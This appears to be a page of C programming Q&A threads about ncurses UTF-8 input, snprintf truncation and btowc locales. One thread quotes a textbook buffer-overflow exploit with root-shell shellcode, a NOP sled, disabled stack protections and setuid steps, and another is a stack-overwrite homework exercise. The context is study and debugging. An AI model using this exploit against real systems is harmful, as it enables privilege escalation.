reading ncurses stdin in UTF-8

In a Linux program I am developing in C with ncurses, I need to read stdin in UTF-8 encoding. However, whenever I do:
wint_t unicode_char=0;
get_wch(&unicode_char);
I get the wide character in utf-16 encoding (I can see it when I dump the variable with gdb). I do not want to convert it from utf-16 to utf-8, I want to force the input to be in UTF-8 all the time, no matter which Linux distribution runs my program with whatever foreign language the user has it configured. How is this done? Is it possible?
EDIT:
Here is the example source and proof that internally get_wch uses UTF-16 (which is the same as UTF-32) and not UTF-8, despite that I configured UTF-8 input source with setlocale().
[niko@dev1 ncurses]$ gcc -g -o getch -std=c99 $(ncursesw5-config --cflags --libs) getch.c
[niko@dev1 ncurses]$ cat getch.c
#define _GNU_SOURCE
#include <locale.h>
#include <ncursesw/ncurses.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int ct;
wint_t unichar;
int main(int argc, char *argv[])
{
setlocale(LC_ALL, ""); /* make sure UTF8 */
initscr();
raw();
keypad(stdscr, TRUE);
ct = get_wch(&unichar); /* read character */
mvprintw(24, 0, "Key pressed is = %4x ", unichar);
refresh();
getch();
endwin();
return 0;
}
Testing code with GDB:
🔎
Breakpoint 1, main (argc=1, argv=0x7fffffffded8) at getch.c:18
18 mvprintw(24, 0, "Key pressed is = %4x ", unichar);
Missing separate debuginfos, use: dnf debuginfo-install ncurses-libs-5.9-21.20150214.fc23.x86_64
(gdb) print unichar
$1 = 128270
(gdb) print/x ((unsigned short*) (&unichar))[0]
$2 = 0xf50e
(gdb) print/x ((unsigned short*) (&unichar))[1]
$3 = 0x1
(gdb) print/x ((unsigned char*) (&unichar))[0]
$4 = 0xe
(gdb) print/x ((unsigned char*) (&unichar))[1]
$5 = 0xf5
(gdb) print/x ((unsigned char*) (&unichar))[2]
$6 = 0x1
(gdb) print/x ((unsigned char*) (&unichar))[3]
$7 = 0x0
(gdb)
The input character is 🔎, and its UTF-8 should be 'f09f948e' as stated here: http://www.fileformat.info/info/unicode/char/1f50e/index.htm
How do I get UTF-8 directly from get_wch()? Or is there another function for this?
P.S.
if you test the source code, link against '-lncursesw' , not '-lncurses' or compile with the same command as I did above

Short: you don't get UTF-8 from get_wch. That returns a wint_t (and a status code).
Long: you would get UTF-8 from ncurses getch because it converts to/from wchar_t internally:
Your program would have to read the encoded character one byte at a time, because getch only returns bytes (possibly combined with video attributes).
ncurses stores wchar_t values in the cells of each window structure.
addch and friends attempt to collect bytes for multibyte encodings (it's not specific to UTF-8, but not much used aside from this).
The attempt fails if you move the cursor in the middle of a string.
For what it's worth, dialog reads UTF-8 using getch. See inputstr.c to see how it works in practice.
X/Open curses as such does not do this (for the rare individual actually using Unix curses with UTF-8, there's no specified way).
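If the wint_t returned by get_wch is kept, turning it into UTF-8 bytes is a small step. The sketch below is an illustration rather than anything ncurses provides: encode_utf8 is a hypothetical helper, and it assumes the wide character holds a Unicode code point, as the gdb dump in the question suggests (128270 is 0x1F50E).

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: encode one Unicode code point as UTF-8.
   Writes up to 4 bytes into out and returns the byte count,
   or 0 for surrogates and values above U+10FFFF. */
size_t encode_utf8(uint32_t cp, unsigned char out[4]) {
    if (cp < 0x80) {                       /* 1 byte: 0xxxxxxx */
        out[0] = (unsigned char)cp;
        return 1;
    }
    if (cp < 0x800) {                      /* 2 bytes: 110xxxxx 10xxxxxx */
        out[0] = (unsigned char)(0xC0 | (cp >> 6));
        out[1] = (unsigned char)(0x80 | (cp & 0x3F));
        return 2;
    }
    if (cp < 0x10000) {                    /* 3 bytes, surrogates excluded */
        if (cp >= 0xD800 && cp <= 0xDFFF)
            return 0;
        out[0] = (unsigned char)(0xE0 | (cp >> 12));
        out[1] = (unsigned char)(0x80 | ((cp >> 6) & 0x3F));
        out[2] = (unsigned char)(0x80 | (cp & 0x3F));
        return 3;
    }
    if (cp <= 0x10FFFF) {                  /* 4 bytes */
        out[0] = (unsigned char)(0xF0 | (cp >> 18));
        out[1] = (unsigned char)(0x80 | ((cp >> 12) & 0x3F));
        out[2] = (unsigned char)(0x80 | ((cp >> 6) & 0x3F));
        out[3] = (unsigned char)(0x80 | (cp & 0x3F));
        return 4;
    }
    return 0;
}
```

Called with the value from the question, encode_utf8(0x1F50E, out) fills out with f0 9f 94 8e, the bytes the asker expected. The standard wcrtomb function is an alternative, but it produces the encoding of the current locale, which is UTF-8 only when the locale says so.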

Related

Why do I get a segmentation fault in the exploit_notesearch program from "Hacking: The Art of Exploitation"?

So, to start off with, I am on Kali 2020.1, fully updated. 64 bit.
The source code is as follows:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include "hacking.h"
#include <unistd.h>
#include <stdlib.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
long int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory.
strcpy(command, "./notesearch \'"); // Start command buffer.
buffer = command + strlen(command); // Set buffer at the end.
if(argc > 1) // Set offset.
offset = atoi(argv[1]);
ret = (long int) &i - offset; // Set return address.
for(i=0; i < 160; i+=4) // Fill buffer with return address.
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // Build NOP sled.
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // Run exploit.
free(command);
}
Now, some important clarifications. I included all those libraries because compilation throws warnings without them.
The preceding notetaker and notesearch programs, as well as this exploit_notesearch program have been compiled as follows in the Terminal:
gcc -g -mpreferred-stack-boundary=4 -no-pie -fno-stack-protector -Wl,-z,norelro -z execstack -o exploit_notesearch exploit_notesearch.c
I no longer remember the source which said I must compile this way (the preferred stack boundary was 2 for them, but my machine requires it to be between 4 and 12). Also, the stack is executable now as you can see.
All 3 programs (notetaker, notesearch, and exploit_notesearch) had their permissions modified as in the book:
sudo chown root:root ./program_name
sudo chmod u+s ./program_name
I tried following the solution from this link: Debugging Buffer Overflow Example , but to no avail. Same goes for this link: Not So Fast Shellcode Exploit
Changing the offset incrementally from 0 to 330 by using increments of 1, 10, 20, and 30 in the terminal using a for-loop also did not solve my problem. I keep getting a segmentation fault no matter what I do.
What could be the issue in my case and what would be the best way to overcome said issue? Thank you.
P.S I remember reading that I'm supposed to use 64-bit shellcode instead of the one provided.

When you are segfaulting, it is a great time to run the program within a debugger like GDB. It should tell you right where you are crashing, and you can step through the execution and validate the assumptions you are making. The most common segfaults tend to be invalid memory permissions (like trying to execute a non-executable page) or an invalid instruction (e.g., if you land in the middle of shellcode, not in a NOP sled).
You are running into a couple of issues trying to convert the exploit to work on 64-bit. When filling the buffer with return addresses, the code uses the constant 4 and an unsigned int store, while pointers on 64-bit are actually 8 bytes.
for(i=0; i < 160; i+=4) // Fill buffer with return address.
*((unsigned int *)(buffer+i)) = ret;
That could also present some issues when trying to exploit the strcpy bug, because those 64-bit addresses will contain NULL bytes (since the usable address space only uses 6 of the 8 bytes). Thus, if you have some premature NULL bytes before actually overwriting the return address on the stack, you won't actually copy enough data to leverage the overflow as intended.
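Both points can be checked with plain arithmetic. The following is a minimal sketch with hypothetical helper names; the address 0x00007fffffffe0a0 used in the note after it is only an example of a typical user-space stack address, not a value taken from the question.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: how many bytes of a 64-bit value, laid out
   least significant byte first (as on x86-64), precede its first
   zero byte. A strcpy-style copy stops at that zero byte. */
size_t bytes_before_first_zero(uint64_t addr) {
    size_t n = 0;
    while (n < sizeof addr && ((addr >> (8 * n)) & 0xFF) != 0)
        n++;
    return n;
}

/* Hypothetical helper: what survives when a 64-bit address is stored
   through an unsigned int pointer, as the fill loop does. */
uint32_t truncate_to_32(uint64_t addr) {
    return (uint32_t)addr;
}
```

For 0x00007fffffffe0a0, bytes_before_first_zero gives 6 and truncate_to_32 gives 0xffffe0a0: the upper half of the address is lost in the fill loop, and a string copy of the full address would stop after six bytes.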

snprintf() overflows specified length

I was writing my own ncurses-like library when I found in GDB that snprintf() returned a length larger than the size I specified. Is this defined behaviour or a mistake of mine? The (reproducible) code snippet is this:
niko: snippets $ cat snprintf.c
#include <unistd.h>
#include <stdio.h>
char *example_string="This is a very long label. It was created to test alignment functions of VERTICAL and HORIZONTAL layout";
void snprintf_test(void) {
char tmp[72];
char fmt[32];
int len;
unsigned short x=20,y=30;
snprintf(fmt,sizeof(fmt),"\033[%%d;%%dH\033[0m\033[48;5;%%dm%%%ds",48);
len=snprintf(tmp,sizeof(tmp),fmt,y,x,0,example_string);
write(STDOUT_FILENO,tmp,len);
}
int main(void) {
snprintf_test();
}
niko: snippets $
Now we compile with debugging info and run:
niko: snippets $ gcc -g -o snprintf snprintf.c
niko: snippets $ gdb ./snprintf -ex "break snprintf_test" -ex run
.....
Reading symbols from ./snprintf...done.
Breakpoint 1 at 0x40058e: file snprintf.c, line 10.
Starting program: /home/deptrack/depserv/snippets/snprintf
Breakpoint 1, snprintf_test () at snprintf.c:10
10 unsigned short x=20,y=30;
Missing separate debuginfos, use: dnf debuginfo-install glibc-2.22-16.fc23.x86_64
(gdb) s
12 snprintf(fmt,sizeof(fmt),"\033[%%d;%%dH\033[0m\033[48;5;%%dm%%%ds",48);
(gdb) print sizeof(fmt)
$1 = 32
(gdb) print sizeof(tmp)
$2 = 72
(gdb) s
13 len=snprintf(tmp,sizeof(tmp),fmt,y,x,0,example_string);
(gdb) print fmt
$3 = "\033[%d;%dH\033[0m\033[48;5;%dm%48s\000\000\000\000\000"
(gdb) print example_string
$4 = 0x4006c0 "This is a very long label. It was created to test alignment functions of VERTICAL and HORIZONTAL layout"
(gdb) s
14 write(STDOUT_FILENO,tmp,len);
(gdb) print len
$5 = 124
(gdb) print sizeof(tmp)
$6 = 72
(gdb)
The program outputs garbage at the end of the string. As you can see, the len value returned from snprintf() indicates that the function has printed more than the allowed size of 72. Is this a bug or my mistake? If this behaviour is defined, then why do the snprintf() docs say it will print at most n characters? That is a very misleading and bug-prone statement. I will have to write my own snprintf() to solve this problem.

Actually (from "man snprintf"):
If the output was truncated due to this limit then the return value is the number of characters (excluding the terminating null byte) which would have been written to the final string if enough space had been available.
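So the buffer itself is never overrun; only the return value can exceed its size. A minimal sketch of how the length passed to write() could be clamped is shown here; stored_length is a hypothetical helper name, not part of the C library.

```c
#include <stddef.h>

/* Hypothetical helper: given snprintf's return value and the buffer
   size passed to it, return how many bytes were actually stored
   (excluding the terminating null byte). */
size_t stored_length(int ret, size_t bufsize) {
    if (ret < 0 || bufsize == 0)
        return 0;                 /* output error, or nothing could be stored */
    if ((size_t)ret >= bufsize)
        return bufsize - 1;       /* output was truncated */
    return (size_t)ret;           /* everything fit */
}
```

In the question's code this would mean calling write(STDOUT_FILENO, tmp, stored_length(len, sizeof(tmp))), which writes 71 bytes instead of 124.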

Linux, field_buffer does not provide a UTF-8 string

In a C program for Linux, with ncursesw and form, I need to read the string stored in a field, with support for UTF-8 characters. When ASCII only is used, it is pretty simple, because the string is stored as an array of char:
char *dest;
...
dest = field_buffer(field[0], 0);
If I try to type a UTF-8 and non-ASCII character in the field with this code the character does not appear and it is not handled. In this answer for UTF-8 it is suggested to use ncursesw. But with the following code (written following this guide)
#define _XOPEN_SOURCE_EXTENDED
#include <ncursesw/form.h>
#include <locale.h>
int main()
{
...
setlocale(LC_ALL, "");
...
initscr();
wchar_t *dest;
...
dest = field_buffer(field[0], 0);
}
the compiler produces a warning:
warning: assignment from incompatible pointer type [enabled by default]
dest = field_buffer(field[0], 0);
^
How to obtain from the field an array of wchar_t?
ncursesw uses get_wch instead of getch, so which function does it use instead of field_buffer()? I couldn't find it by googling.

The program is compiled in a system with the following locale:
$ locale
LANG=it_IT.UTF-8
LANGUAGE=
LC_CTYPE="it_IT.UTF-8"
LC_NUMERIC="it_IT.UTF-8"
LC_TIME="it_IT.UTF-8"
LC_COLLATE="it_IT.UTF-8"
LC_MONETARY="it_IT.UTF-8"
LC_MESSAGES="it_IT.UTF-8"
LC_PAPER="it_IT.UTF-8"
LC_NAME="it_IT.UTF-8"
LC_ADDRESS="it_IT.UTF-8"
LC_TELEPHONE="it_IT.UTF-8"
LC_MEASUREMENT="it_IT.UTF-8"
LC_IDENTIFICATION="it_IT.UTF-8"
LC_ALL=
It supports and uses UTF-8 as a default. With a locale like this, when the ncursesw environment is used, the C program should be able to save UTF-8 characters into a char array.
In order to correctly set up ncursesw it is very important to follow all the steps of the mentioned guide. In particular, the program should have the header
#define _XOPEN_SOURCE_EXTENDED
#include <ncursesw/form.h>
#include <stdio.h>
#include <locale.h>
The program should be compiled as
gcc -o executable_file source_file.c -lncursesw -lformw
and the program should contain
setlocale(LC_ALL, "");
before initscr(). With all these conditions satisfied, the string can be saved into a normal char array, as if ncurses and ASCII were used instead of ncursesw and UTF-8. As John Bollinger pointed out in the comments, the function field_buffer can only return a char *, so there is no point in assigning its result to any other type such as wchar_t *.
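If wide characters are still wanted, the char * returned by field_buffer can be converted afterwards with the standard mbstowcs function, which decodes according to the current locale. This is a sketch under that assumption; multibyte_to_wide is a hypothetical helper name, and the caller is expected to have called setlocale(LC_ALL, "") already.

```c
#include <stdlib.h>
#include <string.h>
#include <wchar.h>

/* Hypothetical helper: convert a multibyte string (UTF-8 in a UTF-8
   locale) to a newly allocated wide string. Returns NULL on allocation
   failure or on an invalid multibyte sequence. The caller frees it. */
wchar_t *multibyte_to_wide(const char *mb) {
    /* A wide string never needs more elements than the byte count. */
    size_t cap = strlen(mb) + 1;
    wchar_t *wide = malloc(cap * sizeof *wide);
    if (wide == NULL)
        return NULL;

    size_t n = mbstowcs(wide, mb, cap);
    if (n == (size_t)-1) {        /* invalid sequence for this locale */
        free(wide);
        return NULL;
    }
    wide[n] = L'\0';              /* n is at most cap - 1 */
    return wide;
}
```

A call such as multibyte_to_wide(field_buffer(field[0], 0)) would then give a wchar_t * that can be indexed per character rather than per byte.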

Does btowc(c) always return ( c in 0..127 ? c : WEOF )?

Is btowc(3) locale-dependent? I thought that with LANG=en_US.iso88591 it would return some European characters for bytes between 128 and 255, but it returns WEOF.
$ printf '\xFF\n' | iconv -f iso88591
ÿ
$ LANG=en_US.iso88591 ./a.out
255 -1
#include <stdio.h>
#include <wchar.h>
int main() {
int i = 0xFF;
printf("%d %d\n", i, btowc(i));
}

On my system anyway, going:
#include <locale.h>
//...
setlocale(LC_CTYPE, "en_US.iso88591");
causes the output to be 255 255. So this indicates that it does seem to be locale-dependent, although the C standard doesn't explicitly say that it is, as far as I can see. (It says that the mbs* function family are locale-dependent, but doesn't say so for btowc.)
Your post looks like you are expecting the LANG environment variable to select the locale at program startup. That variable may affect how gcc reads your source files, but it has no run-time effect unless the program asks for it: the C standard says that all programs start up in the "C" locale, and the environment is consulted only when the program calls setlocale with an empty string as the locale name, e.g. setlocale(LC_CTYPE, "").
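To make the dependence on setlocale explicit, here is a small sketch. The wrapper name btowc_in_locale is hypothetical; setlocale and btowc are the standard functions.

```c
#include <locale.h>
#include <wchar.h>

/* Hypothetical helper: evaluate btowc(byte) under the named LC_CTYPE
   locale. Pass "" to take the locale from the environment (LANG, LC_*).
   Returns WEOF if the locale cannot be set. Note that it changes the
   process-wide locale as a side effect. */
wint_t btowc_in_locale(int byte, const char *locale_name) {
    if (setlocale(LC_CTYPE, locale_name) == NULL)
        return WEOF;
    return btowc(byte);
}
```

With this, btowc_in_locale(0xFF, "") follows LANG, so the result depends on which locales are installed on the machine, while btowc_in_locale(0xFF, "C") reproduces the startup behaviour from the question.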

Code to print the stack in C only returning "1"

I'm learning about security. Here is some sample code I've been given:
#include <stdio.h>
#include <string.h>
char *j; /* use to dump the stack in function cat */
/* Strings to be copied into buffer in function cat */
char str1[] = "";
char str2[] = "";
int main() {
void cat(int *parm) {
char buffer[8];
/* Dump the stack for function cat */
for (j=buffer; j<((char *)&parm); j++)
printf("%p: 0x%x\n", j, *(unsigned char *)j);
/* copy str1 followed by str2 into buffer */
/* note that a \0 remains between str1 and str2 in buffer */
strcpy(buffer, str1);
strcpy(&buffer[strlen(str1)+1], str2);
}
int *arg; /* dummy argument for call to function cat */
int x;
x = 0;
cat(arg);
x = 1;
printf("%d\n",x);
}
I'm compiling with GCC. All I'm getting is "1" though. Any ideas why?
Also, my goal is to eventually get the program to print out "0", and achieve this by only adding code to cat(). I can't change anything already there, just add. Any help to get me started in the right direction.

I'm compiling with GCC. All I'm getting is "1" though. Any ideas why?
We can see
x = 1;
printf("%d\n",x);
so that is likely the only print statement actually being run.
So I infer that for (j=buffer; j<((char *)&parm); j++) is never entered.
Which is a bit weird. I'd expect a downward growing stack, so I'd expect the address of the parameter parm to be higher than buffer.
What machine are you using?
Try printing the values of buffer and &parm, e.g.
void cat(int *parm) {
char buffer[8];
printf("buffer=%p\n", buffer);
printf("&parm=%p\n", &parm);
...

Your trampoline code compiles fine for me:
gcc -o tramp tramp.c
on Linux 2.6.24,
$ gcc --version
gcc (GCC) 4.3.4 20090804 (release) 1
My output:
jim@jim-HP ~
$ cc tramp.c -o tramp
jim@jim-HP ~
$ tramp
0x28ccf0: 0x4
0x28ccf1: 0x6f
0x28ccf2: 0x24
0x28ccf3: 0x61
0x28ccf4: 0x6
0x28ccf5: 0x6f
0x28ccf6: 0x24
0x28ccf7: 0x61
0x28ccf8: 0x28
0x28ccf9: 0xcd
0x28ccfa: 0x28
0x28ccfb: 0x0
0x28ccfc: 0xa8
0x28ccfd: 0x11
0x28ccfe: 0x40
0x28ccff: 0x0
1
Is that what you meant by 'all I got was 1'?

I get the same results with gcc 4.6.2 on 64-bit Linux, whether I use native 64-bit compilation or make a 32-bit executable with -m32. Looking at the assembly code produced by gcc -S, the issue is that gcc is making a local copy of parm in the stack frame of cat, with an address lower than buffer.
Now in the case of 64-bit code gcc has no choice on that point, since the argument is passed in a CPU register, and there would be no other way to give parm an address for the &parm operation. However, for some reason gcc makes a local copy of parm even in 32-bit code, where it would have a perfectly fine copy already in the stack.
In any case I think all this is a side issue for your homework: you can get a better upper bound for the loop by passing something useful in parm and then use parm instead of &parm at the loop bound in cat.
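A bounded dump of that kind could look like the sketch below. dump_range is a hypothetical name, and it assumes both pointers refer to the same region of memory; the C standard leaves relational comparison of pointers into unrelated objects undefined, so the stack-walking use in the exercise relies on compiler- and platform-specific behaviour.

```c
#include <stdio.h>

/* Hypothetical helper: print every byte in [lo, hi) in the same format
   as the original loop and return how many bytes were printed.
   Prints nothing when lo is not below hi, which is the situation the
   original loop ran into. */
size_t dump_range(const unsigned char *lo, const unsigned char *hi) {
    size_t count = 0;
    for (const unsigned char *p = lo; p < hi; p++) {
        printf("%p: 0x%x\n", (const void *)p, *p);
        count++;
    }
    return count;
}
```

A return value of 0 makes the empty-range case visible immediately, instead of leaving only the final "1" on the screen.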
